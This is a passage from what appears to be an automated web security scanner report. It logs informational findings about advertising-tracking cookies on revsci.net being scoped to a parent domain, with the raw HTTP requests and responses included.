Set-Cookie: optout=0+0+0; Domain=.pro-market.net; Expires=Mon, 09-Sep-2041 16:48:17 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Location: http://pbid.pro-market.net/engine?optout=$nai_verify$
Content-Type: text/html
Content-Length: 0
Date: Sat, 17 Sep 2011 16:48:17 GMT
Connection: close

12.114. http://pix04.revsci.net/F09828/a4/0/0/0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /F09828/a4/0/0/0.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /F09828/a4/0/0/0.js HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: NETID01=f9891e48fd6ce58119cd075cc3adf5a4; NETSEGS_K05540=e98f30f2b8e2390e&K05540&0&4e91904a&0&&4e6c320d&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_H07707=e98f30f2b8e2390e&H07707&0&4e8312a8&4&10921,10926,11001,11087&4e5db56e&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_J08778=e98f30f2b8e2390e&J08778&0&4e8636da&0&&4e604379&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_I09839=e98f30f2b8e2390e&I09839&0&4e999932&0&&4e740fed&239be0b9fdae6d2fbd805afcd850cfc7; rsiPus_s-1i="MLsX8FUNJi5nYDzKoFXYD5Xit87XeFMuxqfJJEjoH3Asb2Rl2kU6QiFSJzLFQZ4wWCp9eiUz+kCaIWJyWumpxVE3Ky7nxDyQfHtpE9D/ufUIfbyOG+UzR0hwySYCIMtT5i4HHb812uDswuCEg9I3aJXSp5VnT4MRhNG2lgqsO0eTJlTA+4Kdax3CU/VpVvxGagQdu16H1rdfI2okfyYamGF9gmmfcB2WKuP0T5I2QD+KWm69zp+07xvfArOi2Ue0uR2xalrFug6uy/q2EZSJ6APAwt3CLA+dxqPlaecialiPEOh1L55Qc0xwKAezf6+C3LuHLDN8Mt5bdknkprOVhkT26fDw1X5IMQpC/yyvNZkofE3w6gomw+JONvXHgJQtL7O6/NVgInSpPwwmTuIjHE1FilDtnVhW0IHEs/6Cjp1U3BaXoqGpCMvtpYXc6GrxksQw/ueSnxKMMVDYJjhMxxA6qeHlV//ihVc0859zw1pcGEievEw7REJFzvpkadPBqteUtgZ6wBbewqZ6Pge9Ht3pHHiK1/6f28NHjjrP3vjEwa+p1zKJGFJ6xzs="; rsi_us_1000000="pUMd4y+nMBYU7dTLYT75CtswkWJJZC1BifocPlLTwPiW7DQrHOgd62ZTc0hTOCFFtbp5Dasfi0v9zHAmV/H+6y9udDO9F3+RrR+iRkENJVMK27CLPP4fHfi3umeQphrfu3FTtaKpIgHriVu3RrESpb8kNt5dkLnaboDkhXHRwqwtfiT7qOSgUILdk09I6dcW1vOgSGMCtGgEkBM9FK3LWyOHvsqiw8AaK7V5zKiikAdaZV57WErynrBKps8Mau5Uaq2HBNx04J0PFmch96LWNgMNmX6MUXF8wjkqwd9j6iV/jhMzAN70b9vkPJZyUw7A9N0tRh68YBWiVobaDjXGDG2Y7Z+XKNTPBcShluzVjJtRUnOCdxLdVxoy8Y2YLiUQca3yzDaBoHke7EW/6uL6/lYUiYbH+KKdHvI0vGzMy6MO8t/Zx+hEFO6iwXLVkwZe8uhXqp1DZvjWxRnsuvAnZ2SvE9xIAGhu2O7nBAuzTB5b9iVKPDEW+8oTG0NndlSZ3fDku9z3eiG7gnp9d0B84rOlWEBLOtV4nOFoCK+IePsGbDU3O6pRAhFgLkZkyvQjViq4eOyR3leHsdVIc8HU/A7GYPwMRI7uNi/wPpc1B/zBnQY9YhzXhIgO7fN4BbuX593brrwu4vOTXVTB6kjtJrs3FiFMrp2M/y4sZ/2pkZs2oH7TtWPgShREi4ab8n3IOBC9FvrPvqu32C/1vUeOAkHQjRFNFoRtrGusjwZuF2tMz4UpthXcUs2CNCemyMjgU4mnycT5qW2l1fEeF6V3k1XhCPZbObHefs44yUAMUw4KNLMO0sfiJH/oYaIKR/rKHA+tvGNxG9YpiTftWnMiZjuDHgdmjFaismU6LSNz+LEuwDzWaT+844WqD9B3AiMtk7ggwCT/RqWRQs04C/X7nixI6vX4t6Xt8WkrH0Zz9NV2C6TI287z6dPDQ1+u3axu1YLfQHvckVqPdelQTKtqzBvI6Xssfb/7viF6Rl/E6ThP57DKGJxSNmoNd+YfiMUTYCaaHQVgLIrT8yl7ILpkVQbdK9y9VtfzuZwRicoXCPES0SrKqd3DeH+QCE3Ixk80rRMEdzACg1kRyIrBnmLytknaZk7q2Jwweh/JW4FjBJKXf51IXJFH1kDrsAWDdJ6UmZbUh6SNycMq8QZUJK9ZjsbybFDTT9Ics5+Q"; rsi_segs_1000000="pUPFJkmBrwIMl594t637EICbRK4QHREL5G4UoYRo7896qYeIB48s9uNg2v9kDss6IrPb32QuIL+bIwarfPSfqUd5S4nO4rEaCMB3c5cqvtmVJTD7RS1izwssR0oib1pPBbx1qGbV7a0FZa/ttw8nvD4MjXuMpeaX5OgYwfXJ5h5WWtu8iosDYqNDlzAJYwVFsh9yKraBHw53DUaGtDFpSKWMXipYi6X4Dhsa0gjyxXSSUoLnasthgWId2lZkqaFBC7TKe+mgdB7yCLSUZxG5kVU+srUbRr/ZR2fZ3q8CQ7iAxc6+MMicoleEnuwaxL7qT2WChl/DSipIkOEQCUhn+x8="; NETSEGS_F10931=e98f30f2b8e2390e&F10931&0&4e99b65c&0&&4e73f9df&239be0b9fdae6d2fbd805afcd850cfc7; rtc_xNIB=MLvv9aEOYT5j57ifixrq7MypO1kpmAW3jAX8npqiREgE/DkJ/NiVVqHNx4VzX5l4ou2be6wmaiY+FuIzIBY8LyUBBvjnoXyr57fk8UH/q5eICMks3cmQwVKsWcfTKfuIPxHmracEEDhg0PpDsTPxkmfOEmzRjViqWq5DAJflrTDaM/cNLgfxNfxdB2EXHWdPGQoogkN6dheaiJYNxNgJl0tTU7TAt3g6FkZAF0a5M1+Qr2mExBWKwdHOs6ixiLay82KyMj3L8NBO5iV8xDXWYAaMO33KTI86GimXkvVNNW8Mwqsnv0+bWPaCqyN8foLrlfXDEQArn4BsO43QoQzst1wLE1gzxWrwNlbj2jI228s/gRNUvhO2dkLGiwOsVKa5MdfOF5Ty373AI52IyBwSeqn5gfiqUejzz2iIx2jqU1AWrUVpepsbaxea/ksje4mbpa+ulGNp4Z0MGQKki911fKipzdEfO3oS9oKg9oLL0UkcWq+FfVKbc4duBwjL8RIVNgfbQbGwSNQ9NLKGEGvZPMio00MIwlSqzSwqehW7JHUVhmSYic6Iy+bKBt1hO2xHfNcuMHSnjV4tXGEPNpCqxBZN84tRP0YoFSk44aJ8kGk4M4qtJjAeXTKRLs3/r2X4g0pJ10I/PnFi2eBHQx1YcL0bayGPHcarbHvwoYodig2hrif1WHj1Fszt1c2arQDymiTuVgRA4ZA3Vu5K; udm_0=MLv39CEJZjpv597JCM1YKC+qfowJLkXm5HzcyJTaomayNeTIOt0mZGCnnxCU3g5Fl7++17leNm8ffHAB6b/mVCtcPC0+5TNgOqGlLOcs7kcw6WMqaKWl2kIvQZjEsolL0pz4vf6LEszPlgna/4OBy5/4ZkTTspiv9Msm6hzYCWbeP2g+R5/58eVFI8tRMfSjfnQLqH0/pEMmXXwmwuU8xD+kpzoEsTO7ez5HPy5K+mbh4LfHaMsWCL+XCTKWI9cdmIHl+gVPDTgc3CK8pLaz/7jrNk0pxHNOuHrk4FVkIDy9k2EMXKHSpygrcSIf7V0cXWR0V/SY2w0OzR5WIy7wVWesqdD0kNEUpdOZDrMhImy9MetxZAY/dYUYac7pgETe1YmNjk3G1SVS5XidmU7it/alnDLr7a6rBDiERDC0Lwmk0X2/WdHopasjBk9zXTQ5vymOk6PP8fTs+kGg8y9zoCfQjEhJI59YlVgsN2RbWcLxJ2ltXPcKVi6nKjKJgsfoZVrO2oHGAsWHqCrRziso12dwImO0oREKvquBMv8eypqMG2flmwPHuOnQavYplsHHbLFAK5PxjJhvGwP6B5fMyC68hk3aZMv2Ulug8AJdqWwTKCHtI0K9vgNTLcuQSLIa0T5yNdb6h1hyeG9btd9iyQMBQ4qsMf5kv67ybYgZgigDt5iY/OiCnqWhPexftsafKgOtBMBHwSMUMJQ/2tbGafyiMt6zPL3Xz5/btLPnBQG9mxDc6ZK2l9Oy3v37eFnWjY/J3ov/3q1tBXFezOPwGquiA8AUqL7LrKghR+Rvb8j/LAEShkTECSaC+LWwnz6ocbagwIqFFnAKWAEdy5DE6GhRR4elWwss77kfDtrC2Ends9TFrD/LjKNmZnicyRiU4xlFhQDgppNnnirTaZwTFK60mrg3th0XTTpTOCw+yPFKxeD4FVhNz0FcHh6yuWmKUTkbwk318gZQDfBORxTABzOBilvBEyiOCylwVOuHpFOA1pO1YY9xpWyYg6bhGYSyukJ9jxxM1x6qhi5mLBhvo8a1HTvQTZMC0o/HK+7tLhzPdDM+hTYWisTFw8/QVkhQ+wcbbEwOxhcU73M6QervSnu/q9Dq9+72SG+a2W+PLWrKgOExYBUsBOWpfyVUCb0ASJyPeTOShSVhaQ+fCBvu3XUPxGaOzpGoVD3dQkBOpy5C+1PgxsexVbXgZjAUSQQSfBssmqLcDaVpLyxs+Qopl4Kn563r+MBJgq6zq/TwkNvi/qCkpyT863ibLn3vMNFkJ//YQej4a1f1nAYsSi+KPX8m4ccideWG+VIWkdIeml4cyFsqF+rwR7f62ebxite6HhDXOQZW7V3XjcIb99328u1In9UmhJ6IOYCM3pMZvBgFi5Bq1sp7ZGCqUTRNOzygkzeI6RIYZZ0LlAJpYUQbqlROZdomQThaWYnoIHQ3MS3AA6rHcslHFCVSAuglUFRCsjlstdv++yQ96TcbUvSKhgGjcUjJD0R6kXUu8bCV

Response

HTTP/1.1 200 OK
Set-Cookie: rsi_segs_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJkOBr3IMlp94u+w/laQbf6+az8ELNM5Vc4Rolb9lsncbnFjc6nNskvAlloepK+Ek9geEt3gSIwarfPSfqUd5S4nO0iB2YlcZM/NMKin8fzqXUSnC/Sy1tsi7RILbY9q7D0SyXQG7ZEunXaEn7I7DP1r5/rxrAaklgMbgsmhMaehsndR6+g/Kzcg2pxWT2q+Ir+rquxk5WgHVNoDYdmoRs7WhdBuQK99wbYBNcLbWfRGIq4vDAVlZnmPVS4S89RbrI+KWMzH/Dne4zg+KyBRIVRXxcYQeHD0L15giwAHxUs6qToLe+S16IWWldioI6MFMYXDTHIG8p+3X9CKHEL/R; Domain=.revsci.net; Expires=Sun, 16-Sep-2012 16:37:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:37:08 GMT
Content-Length: 544

/* AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'f09828');}
function asi_addElem(e){if(document.body==null){docu
...[SNIP]...
12.115. http://pix04.revsci.net/F09828/b3/0/3/1008211/677164118.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /F09828/b3/0/3/1008211/677164118.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F09828/b3/0/3/1008211/677164118.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252F%253Fbpid%253D%2526p%253Dhearst%2526n%253DUS%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fhearst.com%252Fnewspapers%252Fmetrix4media.php%26DM_EOM%3D1&C=I09839%2CF09828 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Set-Cookie: rtc_z0DM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IGDA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pfus=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BRdV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jYH_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fzlq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-mxv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mHcA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HXmT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pKCG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Klrm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RU6Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_s926=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_b9i7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_rXeX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_XwpC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2N5M=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_X46z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gR4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_tnvC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HxEK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1zQw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pe6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oybS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__3n9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ix0F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D5V5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gHAY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6BxH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KKED=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_nSm6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_458L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_FYNR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_b81E=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D3Fl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uDaq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kbwA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xA_8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CJm7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_En3x=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fL1F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bXp4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_w6Dv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dhzb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GwOc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a-37=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ux5A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wENX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mFWT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CY0g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oP87=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_izKJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1vJj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mBmG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xguM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5ff3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5UrE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ptS9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6ZIi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZiTd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zcl2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_G-1g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DiFj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDET=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DkBe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_TBg_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sPAt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RGgP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5lwD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1gPF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jRjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UmUi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_d6A3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_JEd3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VbSU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4Z5K=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Fl-k=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xNIB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qcRp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_01oy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZVG6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_g7c4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5F6G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oJ_4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_e-a1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_63TE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QL7V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yj5X=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fHJO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2J0N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oZK5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bA75=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Fuyk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_nQhF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AdCz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_W_su=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-2l6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__2gm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IaYu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_eNoN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_c_QL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_EWGJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_27JF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iZ38=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_feFx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_9tiQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ktrN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_9-p4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_aNV6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UD6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KZb4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_R_Wg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_3rey=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yjUI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oE39=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UjBT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-T1o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_c-sa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5PSX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DLGx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AAAA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Cwp7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_TJQ1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_32hd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__p2w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DoaW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yjf6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_X8sl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qjwD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Q6zq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mbyP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Qq1P=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QjxO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
